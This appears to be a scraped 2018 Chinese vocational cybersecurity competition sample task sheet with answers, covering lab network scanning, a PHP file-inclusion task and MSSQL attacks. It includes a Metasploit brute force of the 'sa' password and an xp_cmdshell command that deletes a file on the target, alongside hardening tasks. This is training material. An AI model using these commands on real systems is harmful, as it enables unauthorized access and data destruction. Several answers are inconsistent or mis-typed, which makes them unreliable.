(新)江苏省2018年度中职组网络空间安全赛项样题及答案

2018年度全国职业技能大赛中职组“网络空间安全”赛项

江苏省竞赛任务书

（样题）

一、竞赛时间

9:00-12:00，共计3小时。

二、竞赛阶段简介

三、竞赛任务书内容

（一）拓扑图

（二）第一阶段任务书

任务1.ARP扫描渗透测试

任务环境说明：

?服务器场景：CentOS5.5

?服务器场景操作系统：CentOS5.5

1.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测

试（使用工具arping，发送请求数据包数量为5个），并将该操作使用

命令中固定不变的字符串作为Flag提交；

Arping –c 5 x.x.x.x

2.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测

试（使用工具arping，发送请求数据包数量为5个），并将该操作结果

的最后1行，从左边数第2个数字作为Flag提交；

Arping –c 5 x.x.x.x

root@kali:~# arping -c 5 192.168.28.122

ARPING 192.168.28.122 from 192.168.28.100 eth0

Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 1.017ms Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 0.638ms Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 1.051ms Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 1.590ms Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 1.051ms Sent 5 probes (1 broadcast(s))

Received 5 response(s)

Flag:5

3.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测

试（使用工具Metasploit中arp_sweep模块），并将工具Metasploit 中arp_sweep模块存放路径字符串作为Flag（形式：字符串1/字符串2/字符串3/…/字符串n）提交；

msf > use auxiliary/scanner/discovery/arp_sweep

Flag:Auxiliary/scanner/discovery/arp_sweep

4.通过PC2中渗透测试平台对服务器场景CentOS

5.5进行ARP扫描渗透测

试（使用工具Metasploit中arp_sweep模块），假设目标服务器场景CentOS5.5在线，请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的最后1个单词作为Flag提交；

msf > use auxiliary/scanner/discovery/arp_sweep

msf auxiliary(arp_sweep) > run

[*] 192.168.28.122 appears to be up (VMware, Inc.).

[*] 192.168.28.2 appears to be up (VMware, Inc.).

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Flag:completed

5.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测

试（使用工具Metasploit中arp_sweep模块），假设目标服务器场景CentOS5.5在线，请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交；

msf auxiliary(arp_sweep) > run

[*] 192.168.28.122 appears to be up (VMware, Inc.).

[*] 192.168.28.2 appears to be up (VMware, Inc.).

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Flag:appears

6.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测

试（使用工具Metasploit中arp_sweep模块），假设目标服务器场景CentOS5.5在线，请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交；

Flag:exploit or run

任务2.操作系统及应用程序扫描渗透测试

任务环境说明：

?服务器场景：CentOS5.5

?服务器场景操作系统：CentOS5.5

1.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测

试（使用工具nmap，使用参数n，使用必须要使用的参数），并将该操作使用命令中必须要使用的参数作为Flag提交；

Flag:Nmap –n –Sp x.x.x.x

2.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测

试（使用工具nmap），并将该操作显示结果的上数第3行左数第3个单词作为Flag提交；

root@kali:~# nmap -n -sP 192.168.28.122

Starting Nmap 7.40 ( https://https://www.360docs.net/doc/1911593262.html, ) at 2017-12-10 19:59 EST Nmap scan report for 192.168.28.122

Host is up (0.00069s latency).

Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds

Flag:up

3.通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透

测试（使用工具nmap，使用参数n，使用必须要使用的参数），并将该操作使用命令中必须要使用的参数作为Flag提交；

root@kali:~# nmap -n -A 192.168.28.122

Starting Nmap 7.40 ( https://https://www.360docs.net/doc/1911593262.html, ) at 2017-12-10 20:11 EST Nmap scan report for 192.168.28.122

Host is up (0.00025s latency).

Not shown: 998 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.3 (protocol 2.0)

| ssh-hostkey:

| 1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA)

|_ 2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd (RSA) 111/tcp open rpcbind 2 (RPC #100000)

| rpcinfo:

| program version port/proto service

| 100000 2 111/tcp rpcbind

| 100000 2 111/udp rpcbind

| 100024 1 910/udp status

|_ 100024 1 913/tcp status

MAC Address: 00:0C:29:62:80:73 (VMware)

Device type: general purpose

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:linux_kernel:2.6

OS details: Linux 2.6.9 - 2.6.30

Network Distance: 1 hop

TRACEROUTE

HOP RTT ADDRESS

1 0.25 ms 192.168.28.122

OS and Service detection performed. Please report any incorrect results at https://https://www.360docs.net/doc/1911593262.html,/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 8.22 seconds

Flag:Nmap –n –A x.x.x.x

4.通过PC2中渗透测试平台对服务器场景CentOS

5.5进行综合性扫描渗透

测试（使用工具nmap，使用参数n，使用必须要使用的参数），并将该操作显示结果的最后1行最后1个单词作为Flag提交；

root@kali:~# nmap -n -A 192.168.28.122

Starting Nmap 7.40 ( https://https://www.360docs.net/doc/1911593262.html, ) at 2017-12-10 20:11 EST Nmap scan report for 192.168.28.122

Host is up (0.00025s latency).

Not shown: 998 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.3 (protocol 2.0)

| ssh-hostkey:

| 1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA) |_ 2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd (RSA) 111/tcp open rpcbind 2 (RPC #100000)

| rpcinfo:

| program version port/proto service

| 100000 2 111/tcp rpcbind

| 100000 2 111/udp rpcbind

| 100024 1 910/udp status

|_ 100024 1 913/tcp status

MAC Address: 00:0C:29:62:80:73 (VMware)

Device type: general purpose

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:linux_kernel:2.6

OS details: Linux 2.6.9 - 2.6.30

Network Distance: 1 hop

TRACEROUTE

HOP RTT ADDRESS

1 0.25 ms 192.168.28.122

OS and Service detection performed. Please report any incorrect results at https://https://www.360docs.net/doc/1911593262.html,/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 8.22 seconds

Flag:seconds

5.通过PC2中渗透测试平台对服务器场景CentOS5.5进行操作系统扫描渗

透测试（使用工具nmap，使用必须要使用的参数），并将该操作使用命令中必须要使用的参数作为Flag提交；

root@kali:~# nmap -O 192.168.28.122

Starting Nmap 7.40 ( https://https://www.360docs.net/doc/1911593262.html, ) at 2017-12-10 20:13 EST Nmap scan report for 192.168.28.122

Host is up (0.00044s latency).

Not shown: 998 closed ports

PORT STATE SERVICE

22/tcp open ssh

111/tcp open rpcbind

MAC Address: 00:0C:29:62:80:73 (VMware)

Device type: general purpose

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:linux_kernel:2.6

OS details: Linux 2.6.9 - 2.6.30

Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://https://www.360docs.net/doc/1911593262.html,/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 14.80 seconds Flag:Nmap –O x.x.x.x

6.通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及

版本号扫描渗透测试（使用工具nmap，使用必须要使用的参数），并将该操作使用命令中必须要使用的参数作为Flag提交；

Flag:Nmap –sV x.x.x.x

7.通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及

版本号扫描渗透测试（使用工具nmap，使用必须要使用的参数），并将该操作显示结果的SSH服务版本信息字符串作为Flag提交；

root@kali:~# nmap -sV 192.168.28.122

Starting Nmap 7.40 ( https://https://www.360docs.net/doc/1911593262.html, ) at 2017-12-10 20:17 EST Nmap scan report for 192.168.28.122

Host is up (0.00014s latency).

Not shown: 998 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.3 (protocol 2.0)

111/tcp open rpcbind 2 (RPC #100000)

MAC Address: 00:0C:29:62:80:73 (VMware)

Service detection performed. Please report any incorrect results at https://https://www.360docs.net/doc/1911593262.html,/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 19.60 seconds

Flag:OpenSSH 4.3

任务3.Web应用程序文件包含安全攻防

任务环境说明：

?服务器场景名称：WebServ2003

?服务器场景安全操作系统：Microsoft Windows2003 Server

?服务器场景安装中间件：Apache2.2；

?服务器场景安装Web开发环境：Php6；

?服务器场景安装数据库：Microsoft SqlServer2000；

?服务器场景安装文本编辑器：EditPlus；

1.访问WebServ2003服务器场景，"/"->"Display Uploaded's File

Content"，分析该页面源程序，找到提交的变量名，并将该变量名作为Flag（形式：name=“变量名”）提交；

2.对该任务题目1页面注入点进行渗透测试，通过php://filter协议使当

前页面以Base64编码方式回显WebServ2003服务器场景访问日志文件：AppServ/Apache2.2/logs/flag.log的内容，并将注入语句作为Flag提交；

3.对该任务题目2页面注入点进行注入以后，将当前页面以Base64编码方

式回显内容作为Flag提交；

4.通过PHP函数对题目3中Base64编码回显内容进行解码，并将解码内容

作为Flag提交；

5.进入WebServ2003服务器场景的目录，找到DisplayFileCtrl.php文件，

使用EditPlus工具打开并填写该文件中空缺的F1、F2、F3、F4的值，使之可以抵御文件包含渗透测试，并提交Flag（形式：F1|F2|F3|F4）；

6.再次对该任务题目1页面注入点进行渗透测试，验证此次利用该注入点

对WebServ2003服务器场景进行文件包含渗透测试无效，并将回显页面源文件内容作为Flag提交；

任务4.数据库安全加固

任务环境说明：

?服务器场景名称：WebServ2003

?服务器场景安全操作系统：Microsoft Windows2003 Server

?服务器场景安装中间件：Apache2.2；

?服务器场景安装Web开发环境：Php6；

?服务器场景安装数据库：Microsoft SqlServer2000；

?服务器场景安装文本编辑器：EditPlus；

1.对服务器场景WebServ2003安装补丁，使其中的数据库Microsoft

SqlServer2000能够支持远程连接，并将补丁包程序所在目录名称作为Flag提交；

2.对服务器场景WebServ2003安装补丁，使其中的数据库Microsoft

SqlServer2000能够支持远程连接，在安装补丁后的服务器场景中运行netstat–an命令，将回显的数据库服务连接状态作为Flag提交；

C:\Documents and Settings\Administrator>netstat -an

Active Connections

Proto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING TCP 192.168.28.131:139 0.0.0.0:0 LISTENING UDP 0.0.0.0:445 *:*

UDP 0.0.0.0:500 *:*

UDP 0.0.0.0:1434 *:*

UDP 0.0.0.0:4500 *:*

UDP 127.0.0.1:123 *:*

UDP 192.168.28.131:123 *:*

UDP 192.168.28.131:137 *:*

UDP 192.168.28.131:138 *:*

Flag:LISTENING

3.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务

扫描渗透测试，并将扫描结果作为Flag提交；

msf > use auxiliary/scanner/mssql/mssql_ping

msf auxiliary(mssql_ping) > run

[*] 192.168.28.131: - SQL Server information for

192.168.28.131:

[+] 192.168.28.131: - ServerName = SERVER

[+] 192.168.28.131: - InstanceName = MSSQLSERVER

[+] 192.168.28.131: - IsClustered = No

[+] 192.168.28.131: - Version = 8.00.194

[+] 192.168.28.131: - tcp = 1433

[+] 192.168.28.131: - np =

\\SERVER\pipe\sql\query

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

4.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务

超级管理员口令暴力破解（使用PC2中的渗透测试平台中的字典文件

superdic.txt），并将破解结果中的最后一个字符串作为Flag提交；

msf > use auxiliary/scanner/mssql/mssql_login

msf auxiliary(mssql_login) > set username sa

msf auxiliary(mssql_login) > set pass_file

/usr/share/wordlists/metasploit/password.lst

msf auxiliary(mssql_login) > run

[*] 192.168.28.131:1433 - 192.168.28.131:1433 - MSSQL - Starting authentication scanner.

[!] 192.168.28.131:1433 - No active DB -- Credential data will not be saved!

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$% (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$%^ (Incorrect: )

WORKSTATION\sa:!@#$%^& (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$%^&* (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!boerbul (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!boerseun (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!gatvol (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!hotnot (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!kak (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!koedoe (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!likable (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!poes (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!pomp (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!soutpiel (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:.net (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:000000 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:00000000 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0007 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:007 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:007007 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0s (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0th (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1 (Incorrect: )

WORKSTATION\sa:10 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:100 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1000 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1000s (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:100s (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1022 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:10s (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:10sne1 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1111 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:11111 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:111111 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:11111111 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:112233 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1212 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:121212 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1213 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1214 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1225 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:123 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:123123 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:123321 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1234 (Incorrect: )

WORKSTATION\sa:12345 (Incorrect: )

[+] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN SUCCESSFUL: WORKSTATION\sa:123456

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Flag: completed

5.通过PC2中de1渗透测试平台对服务器场景WebServ2003进行数据库服

务扩展存储过程进行利用，删除WebServ2003服务器场景C:\1.txt，并

将渗透测试利用命令以及渗透测试平台run结果第1行回显作为Flag

提交；

msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_exec msf auxiliary(mssql_exec) > set rhost 192.168.28.131

msf auxiliary(mssql_exec) > set password 123456

msf auxiliary(mssql_exec) > set cmd cmd.exe /c del "C:\\1.txt"

msf auxiliary(mssql_exec) > run

[*] 192.168.28.131:1433 - SQL Query: EXEC master..xp_cmdshell

'cmd.exe /c del C:\1.txt'

output

------

[*] Auxiliary module execution completed

Flag: [*] 192.168.28.131:1433 - SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c del C:\1.txt'

6.通过对服务器场景WebServ2003的数据库服务进行安全加固，阻止PC2

中渗透测试平台对其进行数据库超级管理员密码暴力破解渗透测试，并

将加固身份验证选项中的最后一个字符串作为Flag提交：

7.验证在WebServ2003的数据库服务进行安全加固后，再次通过PC2中渗

透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令

进行暴力破解（使用PC2中的渗透测试平台中的字典文件

superdic.txt），并将破解结果的从上向下数第3行内容作为Flag提交；

msf auxiliary(mssql_login) > run

[*] 192.168.28.131:1433 - 192.168.28.131:1433 - MSSQL - Starting authentication scanner.

[!] 192.168.28.131:1433 - No active DB -- Credential data will not be saved!

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$% (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$%^ (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$%^& (Incorrect: )